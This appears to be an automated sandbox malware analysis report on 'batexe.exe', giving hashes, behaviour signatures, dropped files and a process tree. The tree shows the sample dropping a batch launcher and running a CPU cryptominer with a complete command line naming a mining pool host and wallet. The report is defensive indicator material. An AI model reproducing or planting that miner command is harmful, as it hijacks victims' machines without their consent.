Analysis
-
max time kernel
293s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
13/02/2024, 22:06
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 32 b2e.exe 1656 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1656 cpuminer-sse2.exe 1656 cpuminer-sse2.exe 1656 cpuminer-sse2.exe 1656 cpuminer-sse2.exe 1656 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/2236-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2236 wrote to memory of 32 2236 batexe.exe 74 PID 2236 wrote to memory of 32 2236 batexe.exe 74 PID 2236 wrote to memory of 32 2236 batexe.exe 74 PID 32 wrote to memory of 4436 32 b2e.exe 75 PID 32 wrote to memory of 4436 32 b2e.exe 75 PID 32 wrote to memory of 4436 32 b2e.exe 75 PID 4436 wrote to memory of 1656 4436 cmd.exe 78 PID 4436 wrote to memory of 1656 4436 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\95C8.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1656
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD50ee7eb586fa968d93fc097723429d4f6
SHA1d56603ce662f06ed257ef5538d5366a71f408627
SHA2569727c661e6d04ea942c7e72f922f0d852f81639e80db82a8b08a8ce5ee7769c1
SHA51230fec65eebe677e32b3fe6044c92f8cf10aefe62e99764129b8741e5a1e06a5315406f1a6016801fd715b1793a6809e165367e83f9c07ac374461168ed92b5b4
-
Filesize
5.0MB
MD5d7d523741b024e1eddf5c5da8816708c
SHA18f58df81524453b99085757fbb5b2609032619ea
SHA25628ad9e0234ebf3b2f8386d632e2d6607899916fd54986547ba9526f14cf76900
SHA51218770add03edb91ad953d4c2aafcf1839f1b34d5349a7b392109fbeb232a944a423e1862571cff9f4ee20147b30a611127ebb87146a7d8835c4d38a41a228cbb
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD59de6a30d1d81bb283083c0029ae1a2e5
SHA13cbeb347e2b5e0deac8d6d956f3457c31cfcebf9
SHA256718138627813b0cc216891d552a856e07bb8926db1543f328b9772b600f9cb32
SHA5128f796cfab92a92b1e1e0c6b8234386d0c167a07648943ee77382bbbbfc38f1b9d69591fbf670ff29242ea0ea25298d5dabcb4abd5027d8e3f0b3c88486f6b72b
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
3.7MB
MD5b152caefb35da1a6fdfaae448b6751db
SHA1feb0dc0fe89c89a94e5c28b0124f417beb13d046
SHA256ed8e6a38fca588055ac9b5927ccd3a673b1be2528532521cd1e1f615dd3b9793
SHA512f4689304e46a771d021162a3fb75c0740eb9d3c575e0df8580f5427e0f6631ac29640577c462be4ce8c1ae021aefddf2359d4054c080c3668b9a69fb33e6391a
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
2.8MB
MD58697f20c9e3336d4a1ee41c1b9a2e223
SHA18ccd1bdf45d4191dc2ee1d16de49b1c52c45b62a
SHA256f43607040bf1fc917cebd4daeb63aa7cb45e0e72a2afc651866b3b0372d8dec5
SHA51279beb271c944430c69294d99cf6d65b537030766f77b446c4ae69bbc2d300b35caf31f77a07f01ea540fb61ee5d3f150e2dd09c13478093f384abfc3cc4fd217
-
Filesize
2.6MB
MD52f7823304dfb3ffc3148649730feea51
SHA1ca688d94ab06a75e1409ed51aaf310f8451a103e
SHA2569758e274fb83b2f32899b9cac4cfeee77aee974cbaa70c2baba586e8534c97e3
SHA512f7414771ad2a79f19dfcb7331a98a6bc53320781b7327d20b1c02cfeab2bf78b14cb7aaffa8a75610caac284a8d33645e7ed4bf4ad372cd823fa741ecbf98fc8